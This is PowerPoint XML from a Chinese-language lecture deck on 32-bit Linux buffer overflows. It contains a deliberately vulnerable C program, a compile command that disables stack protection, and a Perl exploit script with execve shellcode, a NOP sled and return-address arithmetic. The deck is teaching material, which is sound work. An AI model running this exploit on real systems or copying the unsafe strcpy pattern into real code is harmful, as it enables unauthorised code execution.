            <a:chOff x="0" y="247948"/>
            <a:chExt cx="12192000" cy="401597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3795904" y="247948"/>
              <a:ext cx="8396096" cy="401597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object 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726440" y="880450"/>
            <a:ext cx="2684145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 panose="02020603050405020304"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="020206030504050203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例程：</a:t>
            </a:r>
            <a:r>
              <a:rPr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vulnerable.c</a:t>
            </a:r>
            <a:endParaRPr sz="24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092530" y="1262720"/>
            <a:ext cx="10438410" cy="521360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927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="855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char Lbuffer[] = "01234567890123456789========ABCD";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="755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void foo()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="770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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1181100" lvl="2">
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2444750" algn="l"/>
              </a:tabLst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</a:t>
            </a:r>
            <a:r>
              <a:rPr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char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vulnbuff[16];	strcpy (vulnbuff, Lbuffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1181100" lvl="2">
              <a:spcBef>
                <a:spcPts val="760"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3416300" algn="l"/>
              </a:tabLst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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr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("\n%s\n", vulnbuff);	getchar(); /* for debug */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="765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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="755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int main (int argc, char *argv[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="760"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="388620" algn="l"/>
                <a:tab pos="3319145" algn="l"/>
              </a:tabLst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{	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927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="760"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="388620" algn="l"/>
                <a:tab pos="3319145" algn="l"/>
              </a:tabLs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     </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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(Lbuffer, argv[1]);	foo();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="770"/>
              </a:spcBef>
            </a:pP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}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gcc -fno-stack-protector -z execstack -o vul ../src/vulnerable.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2280"/>
              </a:lnSpc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该程序从命令行输入一些信息，用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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" err="1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对其可执行代码调试可知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当输入的信息超出了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28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个字节时会产生溢出错误。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0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332351"/>
            <a:ext cx="19791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08477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攻击程序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="08477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336651"/>
            <a:ext cx="12192000" cy="420431"/>
            <a:chOff x="0" y="247948"/>
            <a:chExt cx="12192000" cy="420431"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2605413" y="247948"/>
              <a:ext cx="9586587" cy="420431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object 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239520" y="942156"/>
            <a:ext cx="9838689" cy="554562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#!/usr/bin/perl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exploit.pl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以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"$"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定义变量，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"."(dot)</a:t>
            </a:r>
            <a:r>
              <a:rPr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点号连接上下两行字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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$shellcode ="\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".  "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr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xcd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\x80";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修改以下代码行，设置正确的程序路径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path="/home/ns/overflow/bin/vul";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计算跳转地址的值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$ret = 0xbffffffc - (length($path)+1) - (length($shellcode)+1);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$new_retword = pack('l', $ret);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printf("[+] Using ret shellcode 0x%x\n",$ret);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$nops="\x90\x90\x90\x90\x90\x90\x90\x90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";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8 NOPs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031490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$nops=$nops.$nops.$nops;	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	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24 NOPs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$nops=$nops."\x90\x90\x90\x90"; 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	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28 NOPs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126105" algn="l"/>
              </a:tabLst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$argv=$nops.$new_retword;	</a:t>
            </a:r>
            <a:r>
              <a:rPr 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			</a:t>
            </a:r>
            <a:r>
              <a:rPr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# </a:t>
            </a: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28 NOPs+RETURN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="2424430">
              <a:lnSpc>
                <a:spcPct val="112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%ENV=(); $ENV{SHELLCODE}=$shellcode;  exec "$path",$argv;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13135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0" name="矩形 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3061335" y="247949"/>
              <a:ext cx="9130665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94" y="888594"/>
            <a:ext cx="55949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缓冲区溢出的</a:t>
            </a:r>
            <a:r>
              <a:rPr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C</a:t>
            </a:r>
            <a:r>
              <a:rPr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程序实例</a:t>
            </a:r>
            <a:r>
              <a:rPr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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006F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example.c</a:t>
            </a:r>
            <a:r>
              <a:rPr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631" y="1383656"/>
            <a:ext cx="7417434" cy="512178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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef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BigBuffer[]="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0123456789012345</a:t>
            </a:r>
            <a:r>
              <a:rPr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67890123456789AB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"; //</a:t>
            </a:r>
            <a:r>
              <a:rPr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32</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="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Bytes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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef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buf01[16];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12700" marR="5074285">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr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SmallBuffer[16]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;  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5074285">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" smtClean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pc="-2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buf02[16];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12700" marR="1985010">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
              </a:tabLst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printf("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address of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BigBuffer=%p\n", BigBuffer);  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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1985010">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean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dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>("address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buf01=%p\n",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buf01); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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1985010">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0" err="1" smtClean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("address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SmallBuffer=%p\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>SmallBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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1985010">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean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dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>("address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buf02=%p\n",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buf02); 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strcpy(buf01,"Buf01");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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="27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strcpy(buf02,"Buf02");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12700" marR="3423920">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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printf("Original buf01='%s'\n", buf01);  printf("Original buf02='%s'\n", buf02);  </a:t>
            </a:r>
            <a:r>
              <a:rPr b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strcpy(SmallBuffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr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BigBuffer);  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean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3423920">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>puts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("After strcpy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done,");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="275"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>printf("buf01='%s'\nbuf02='%s'\n",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buf01,buf02);</a:t>
            </a:r>
            <a:endParaRPr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TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181610" y="316230"/>
            <a:ext cx="287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0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缓冲区溢出概述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336652"/>
            <a:ext cx="12192000" cy="378554"/>
            <a:chOff x="0" y="247949"/>
            <a:chExt cx="12192000" cy="378554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="矩形 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3061335" y="247949"/>
              <a:ext cx="9130665" cy="37846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object 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2835587" y="1265219"/>
            <a:ext cx="5980430" cy="500842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241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$ gcc -o example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../src/example.c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41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$ ./</a:t>
            </a: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example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675"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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15" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>BigBuffer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=0xbffff35b </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="-1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675"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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buf01=0xbffff37c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="-1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675"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean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err="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>SmallBuffer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=0xbffff38c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="-1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675"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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 smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>buf02=0xbffff39c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="-1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675"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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Original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buf01='Buf01'  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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675"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b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Original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buf02='Buf02' </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" spc="-5" dirty="0" smtClean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69900" lvl="1">
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0" smtClean="0"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strcpy is done,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buf01='Buf01' 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buf02='67890123456789AB'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241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$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TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181610" y="316230"/>
            <a:ext cx="287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0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缓冲区溢出概述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278038" y="409575"/>
            <a:ext cx="8913962" cy="378460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" y="409433"/>
            <a:ext cx="613186" cy="378554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0847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bject 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="942557" y="1291722"/>
            <a:ext cx="9978485" cy="493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just">
              <a:lnSpc>
                <a:spcPct val="13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3275" lvl="1" indent="-346075" algn="just">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="24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lvl="2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just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缓冲区溢出错误的危害</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>发生缓冲区溢出错误之后，如果邻近的内存是空闲的（不被进程使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>），</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>则对系统的运行无影响；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>但是，如果邻近的内存是被进程使用的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> 则可能导致进程的不正确运行；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>特别的，如果被覆盖的是函数的返回地址，那么攻击者通过精心构造被拷贝的数据( 即BigBuffer的内容)，则有可能执行期望的任何代码。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="306594" y="399320"/>
            <a:ext cx="2879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itchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" spc="600" dirty="0" smtClean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缓冲区溢出概述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a55b8fb-59c6-46d0-ba0f-fc3df4b0d4a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8722</TotalTime>
  <Words>3362</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>479</Paragraphs>
  <Slides>62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等线</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>华文行楷</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>思源黑体 CN Bold</vt:lpstr>
      <vt:lpstr>思源黑体 CN Normal</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>Stencil</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office 主题​​</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>32位Linux系统的缓冲区溢出</vt:lpstr>
      <vt:lpstr>本章内容</vt:lpstr>
      <vt:lpstr>本章内容</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>缓冲区溢出的C程序实例(example.c)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Linux IA32 缓冲区溢出</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>例程1：mem_distribute.c</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>$gcc -o mem ../src/mem_distribute.c $ ./mem</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>表1. Linux IA32进程映像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IA32构架缓冲区溢出的实例 buffer_overflow.c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图1(a) 攻击串的构造</vt:lpstr>
      <vt:lpstr>图1(b)  即将执行strcpy之前buffer及栈的内容</vt:lpstr>
      <vt:lpstr>图2  执行strcpy语句之后buffer及栈的内容</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>图3(a) 攻击串的构造</vt:lpstr>
      <vt:lpstr>图3(b) 即将执行strcpy之前buffer及栈的内容</vt:lpstr>
      <vt:lpstr>图4  执行strcpy语句之后buffer及栈的内容</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>图5  把shellcode放在环境变量中</vt:lpstr>
      <vt:lpstr>演示</vt:lpstr>
      <vt:lpstr>演示</vt:lpstr>
      <vt:lpstr>例程</vt:lpstr>
      <vt:lpstr>例程</vt:lpstr>
      <vt:lpstr>例程</vt:lpstr>
      <vt:lpstr>作业</vt:lpstr>
      <vt:lpstr>存在漏洞的程序</vt:lpstr>
      <vt:lpstr>攻击程序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VPN虚拟专用网络技术</dc:title>
  <dc:creator>WFY</dc:creator>
  <cp:lastModifiedBy>WFY</cp:lastModifiedBy>
  <cp:revision>447</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-12T06:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-29T00:07:14Z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